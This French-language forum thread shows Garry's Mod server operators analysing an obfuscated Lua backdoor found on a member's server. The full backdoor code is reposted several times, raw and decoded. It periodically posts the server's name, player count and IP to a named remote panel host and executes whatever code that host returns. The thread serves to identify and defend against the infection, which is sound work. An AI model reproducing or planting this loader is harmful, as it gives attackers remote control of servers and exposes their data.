Je crois que je me suis fais backdoor

[Azimut]

Bonjour, je développe mon serveur et voilà se qui s'affiche dans la console :

local fwuJDWHPLFtFTiLCULkObIoNivziGB = tostring local uADhBYmPXDUoPgILZIUqxzLAhLakcU = http.Post local GINbuenZreqlmuWTZjqPEvcHaAcqTV = RunString local QJvMrlEmRrUhdKHFnxPvencExvqtSd = timer.Simple QJvMrlEmRrUhdKHFnxPvencExvqtSd(40, function() timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function() local a = { n = GetHostName(), nb = fwuJDWHPLFtFTiLCULkObIoNivziGB(#player.GetAll()), i = game.GetIPAddress() } uADhBYmPXDUoPgILZIUqxzLAhLakcU( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a, function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code ) GINbuenZreqlmuWTZjqPEvcHaAcqTV(body) end ) end)
end)

Vous pensez que c'est un backdoor ?

 

[Kitsu]

"\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112",

ça ressemble a un code obfusqué nan ? @Taink @Valfunde @Yoh Sambre ♪

 

[Azimut]

ça ressemble a un code obfusqué nan ? @Taink @Valfunde @Yoh Sambre ♪

Je sais pas, mais j'aimerai savoir se que le code fait

 

[Taink]

ça ressemble a un code obfusqué nan ? @Taink @Valfunde @Yoh Sambre ♪

Yep c'est de l'obfusqué, je pense. Et puis on peut se dire que c'est un backdoor quand un http.Post est obfusqué.

 

[Taink]

Je sais pas, mais j'aimerai savoir se que le code fait

Ça pue le vieux panel.

 

[Kitsu]

Yep c'est de l'obfusqué, je pense. Et puis on peut se dire que c'est un backdoor quand un http.Post est obfusqué.

Faut faire quoi ? trouver l'addon et le dégagé ?

 

[Azimut]

Yep c'est de l'obfusqué, je pense. Et puis on peut se dire que c'est un backdoor quand un http.Post est obfusqué.

D'accord, j'attend une âme pour le de crypter merci

 

[BlitzFire]

Bah c'est surement du Base64 attendez

 

[Azimut]

Ça pue le vieux panel.

Ah bon ?

 

[Valfunde]

ça ressemble a un code obfusqué nan ? @Taink @Valfunde @Yoh Sambre ♪

yes

 

[BlitzFire]

Ok c'est pas exactement du Base64 je cherche

 

[Valfunde]

Voilà le code :

timer.Simple(40, function() timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function() local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() } http.Post( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a, function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code ) RunString(body) end ) end)
end)

 

[Taink]

Ah bon ?

local a = { n = GetHostName(), nb = fwuJDWHPLFtFTiLCULkObIoNivziGB(#player.GetAll()), i = game.GetIPAddress() }

Bah je m'en doute un peu quoi... C'est rare d'en avoir l'utilité.

Faut faire quoi ? trouver l'addon et le dégagé ?

Bah je vois pas quoi faire d'autre ^^"

 

[Azimut]

Mais ce code sert à quoi, et il donne quoi une fois décrypter ? Et comment le décrypter ?

 

[Valfunde]

Mais ce code sert à quoi, et il donne quoi une fois décrypter ? Et comment le décrypter ?

C'est une backdoor

 

[Azimut]

C'est une backdoor

J'ai pas d'addons leaks

 

[Taink]

J'ai pas d'addons leaks

Ça peut venir d'addons Workshop.

 

[melcez]

Mais ce code sert à quoi, et il donne quoi une fois décrypter ? Et comment le décrypter ?

Ton serveur est infecté par un panel.
La personne peut avec cela controler ton serveur à distance (restart / stop / rediriger tes joueurs vers un autre serveur).
En décryptant le code, tu devrais avoir l'URL du panel.

 

[Valfunde]

\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112

Voici l'url du http.Post

 

[Azimut]

En décryptant le code, tu devrais avoir l'URL du panel

Comment le décrypter? merci

 

[Azimut]

\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112

Voici l'url du http.Post

Et en étant décrypter ça donne quoi?

 

[melcez]

Comment le décrypter? merci

De ce coté la, aucune idée.
Il faut trouver en quel langage c'est crypté et j'ai la flemme de chercher

 

[BlitzFire]

Ok bon le :

uADhBYmPXDUoPgILZIUqxzLAhLakcU( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
GINbuenZreqlmuWTZjqPEvcHaAcqTV(body)
end
)

est égal a surement

http.Post("
http://mr-robot.mtxserv.fr/panel/core/stage2.php
", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
GINbuenZreqlmuWTZjqPEvcHaAcqTV(body)
end
)

 

[Valfunde]

Voilà le code :

timer.Simple(40, function() timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function() local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() } http.Post( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a, function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code ) RunString(body) end ) end)
end)

@BlitzFire

 

[BlitzFire]

Donc

\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112

=
http://mr-robot.mtxserv.fr/panel/core/stage2.php

 

[Valfunde]

Ok bon le :

uADhBYmPXDUoPgILZIUqxzLAhLakcU( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
GINbuenZreqlmuWTZjqPEvcHaAcqTV(body)
end
)

est égal a surement

http.Post("
http://mr-robot.mtxserv.fr/panel/core/stage2.php
", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
GINbuenZreqlmuWTZjqPEvcHaAcqTV(body)
end
)

Exact, @Snk le proprio de http://mr-robot.mtxserv.fr/ utilise l’hébergement pour nuire a des serveurs

 

[Azimut]

Merci, comment avez-vous fait ? Pour le décrypter

 

[BlitzFire]

@Azimut

\'un nombre'

= ASCII encoding

 

[Azimut]

@Azimut

\'un nombre'

= ASCII encoding

Merci

 

[BlitzFire]

après y'a d'autre methode d'encryption dans ce code

 

[BlitzFire]

Mais @Valfunde vous a partagé le code donc soyez happy

 

[Valfunde]

après y'a d'autre methode d'encryption dans ce code

Bah la c'est bon c'est décrypt, juste en passant les différents step on obtient un code backdoor cc @slownls

 

[Azimut]

Bah la c'est bon c'est décrypt, juste en passant les différents step on obtient un code backdoor cc @slownls

Tu insinue que celui qui a backdoor est slown ?

 

[Valfunde]

Tu insinue que celui qui a backdoor est slown ?

Non dutout, juste qu'avec SlownLs on avait 'crack' un drm fait sur la meme base

 

[Azimut]

Non dutout, juste qu'avec SlownLs on avait 'crack' un drm fait sur la meme base

Ah d'accord

 

[BlitzFire]

Bon bref https://prntscr.com/g8d8v4 si sa embete @Snk faut savoir que le compte mettant en place ce backdoor qui ne sert que de statistiques en mode BIG DATA et le déteneur du sous-domaine 'mr-robot'.

 

[Valfunde]

Ah d'accord

Si il est chaud il te sort même le code du backdoor, mais perso j'ai pas que ca a faire

 

[Valfunde]

Bon bref https://prntscr.com/g8d8v4 si sa embete @Snk faut savoir que le compte mettant en place ce backdoor qui ne sert que de statistiques en mode BIG DATA et le déteneur du sous-domaine 'mr-robot'.

et on tombe sur le panel de marbella :x

 

[Kitsu]

Exact, @Snk le proprio de http://mr-robot.mtxserv.fr/ utilise l’hébergement pour nuire a des serveurs

bizarrement le mr robot me rappelle quelqu'un :') cc @Yoh Sambre ♪

 

[BlitzFire]

CONCLUSION

Il ne faut pas s'affoler car sa ne fait que envoyer le nombres de joueur et l'ip de votre serveur toutes les 40 secondes ​

 

[blublublu]

bizarrement le mr robot me rappelle quelqu'un :') cc @Yoh Sambre ♪

c'est moi, un pote voulait que j'host son panel je l'ai fais

 

[BlitzFire]

et on tombe sur le panel de marbella :x

Toi même tu sais 2015-2014

 

[ZarosOVH]

CONCLUSION

Il ne faut pas s'affoler car sa ne fait que envoyer le nombres de joueur et l'ip de votre serveur toutes les 40 secondes ​

Ouaiz mais avec le panel il lance n'importe quel code sur ton serv xD

 

[BlitzFire]

c'est moi, un pote voulait que j'host son panel je l'ai fais

Non mais serieux le double compte xD @Snk ban stp

 

[BlitzFire]

Ouaiz mais avec le panel il lance n'importe quel code sur ton serv xD

Alors non car le code est déjà implémenté sur le serveur est ne peut etre changé a distance car il est pas acquéri par un http.Fetch.

 

[Valfunde]

Alors non car le code est déjà implémenté sur le serveur est ne peut etre changé a distance car il est pas acquéri par un http.Fetch.

Normalement si y'a d'autres codes qui vont se rajouter après via la fonction au nom etrange

 

[blublublu]

Ouaiz mais avec le panel il lance n'importe quel code sur ton serv xD

il avait pas acces a mon serv

Non mais serieux le double compte xD @Snk ban stp

il peut me ban c'était juste pour donner mon histoire

 

[BlitzFire]

Normalement si y'a d'autres codes qui vont se rajouter après via la fonction au nom etrange

Entièrement raison my bad:

timer.Simple(40, function()
timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function()
local a = {
n = GetHostName(),
nb = tostring(#player.GetAll()),
i = game.GetIPAddress()
}
http.Post( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
RunString(body)
end
)
end)
end)

C'est cette fonction qui est dangereuse:

function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
RunString(body)
end
)

La focntion exécute une autre fonction donné par le site demandé par le POST.

 

[Azimut]

Entièrement raison my bad:

timer.Simple(40, function()
timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function()
local a = {
n = GetHostName(),
nb = tostring(#player.GetAll()),
i = game.GetIPAddress()
}
http.Post( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
RunString(body)
end
)
end)
end)

C'est cette fonction qui est dangereuse:

function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
RunString(body)
end
)

La focntion exécute une autre fonction donné par le site demandé par le POST.

Donc, le code en lui même permet de faire quoi ?

 

[Valfunde]

Donc, le code en lui même permet de faire quoi ?

un backdoor et infecter / controller ton serveur